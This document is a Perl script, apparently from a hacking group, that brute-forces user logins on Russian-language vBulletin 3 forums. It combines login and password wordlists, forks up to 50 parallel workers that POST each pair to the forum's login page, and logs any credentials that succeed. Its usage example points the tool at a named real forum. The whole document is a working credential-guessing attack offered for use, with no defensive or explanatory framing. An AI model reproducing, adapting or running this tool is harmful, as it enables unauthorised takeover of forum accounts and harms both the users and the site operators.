Code
#!/usr/bin/perl
#################################################
# vBulletin 3 (rus) brute
# -------------
#
# copyright : (C) Cyber Lords, 2002-2007
# http://www.cyberlords.net
#
# Coded by VeX [614883]
#################################################
### modules ###
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;
### main ###
usage() if ($ARGV[0] eq "-h" || $ARGV[0] eq "-help");
print "\n\n~~~ vBulletin 3 (rus) brute by VeX 1.0.3 ~~~\n\n";
getopt("lpuht");
$logins = $opt_l || 'logins.txt';
$pass = $opt_p || 'pass.txt';
$host = $opt_u;
$logs = $opt_h || 'logs.txt';
$threads = $opt_t || 50;
open(P, $pass) or die "\n[-] Don't open ".$pass." file\n";
while(<P>) { push(@pass, $_); }
close(P);
open(L, $logins) or die "\n[-] Don't open ".$logins." file\n";
while(<L>) { push(@logins, $_); }
close(L);
print "[+] Loading ".scalar(@logins)." logins\n"; logs("[+] Loading ".scalar(@logins)." logins\n");
print "[+] Loading ".scalar(@pass)." passwords\n"; logs("[+] Loading ".scalar(@pass)." passwords\n\n");
foreach $login (@logins)
{
chomp($login);
foreach $pass (@pass)
{
chomp($pass);
push (@info, "$login---$pass");
}
}
#for(@info){ print "$_\n"; }
while(1) {
for ($i=0;$i<=$threads;$i++) {
unless($info[$counter]) {
killpidz();
exit;
}
if ($pid=fork()) {
push(@forked,$pid);
}
else {
($user, $pass) = split /---/, $info[$counter];
chomp($user); chomp($pass);
if(brute($user, $pass))
{
print "\n\n[+] Find [$user:$pass]";
logs("\n\n[+] Find [$user:$pass]");
$counter = scalar(@info)+1;
exit(1);
}
exit;
}
$counter++;
}
killpidz();
}
sub brute {
my($user, $pass) = @_;
$data = "vb_login_username=$user&cookieuser=1&vb_login_password=$pass&s=&do=login&vb_login_md5password=&vb_login_md5password_utf=";
$cookie_jar = new HTTP::Cookies();
$opera = new LWP::UserAgent;
$opera->agent('Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))');
$opera->timeout(30);
$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => 'http://google.com/';
$request = new HTTP::Request('GET', $host, $h);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);
open(C, ">login_1.html"); print C $content; close(C);
$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => $host;
$request = new HTTP::Request('POST', $host."login.php?do=login", $h);
$cookie_jar -> add_cookie_header($request);
$request->content_type('application/x-www-form-urlencoded');
$request->content('type=another');
$request->content($data);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);
open(C, ">login_2.html"); print C $content; close(C);
if($content=~m/Спасибо за вход/){ print "[+] $user:$pass ... ok\n"; return 1; }
else{ print "[-] $user:$pass ... error\n"; return 0; }
}
sub logs {
$text = shift;
open(L, ">>".$logs); print L $text; close(L);
}
sub usage {
print "\nUsage: $0 [options]...\n\n";
print "Options are:
-u: Forum url
-l: Login's file [Default: login.txt]
-p: Password's file [Default: pass.txt]
-h: Log's file [Default: logs.txt]
-t: Threads [Degault: 50]
-h: This help
Exemple:
perl brute.pl -u \"http://www.raginfo.ru/forum/\" -l users.txt -p big_pass.txt -h logi.txt -t 25\n";
exit(1);
}
sub killpidz {
foreach (@forked) {
chomp;
waitpid($_,0);
kill("TERM" => $_)
}
undef @forked;
}
exit(1);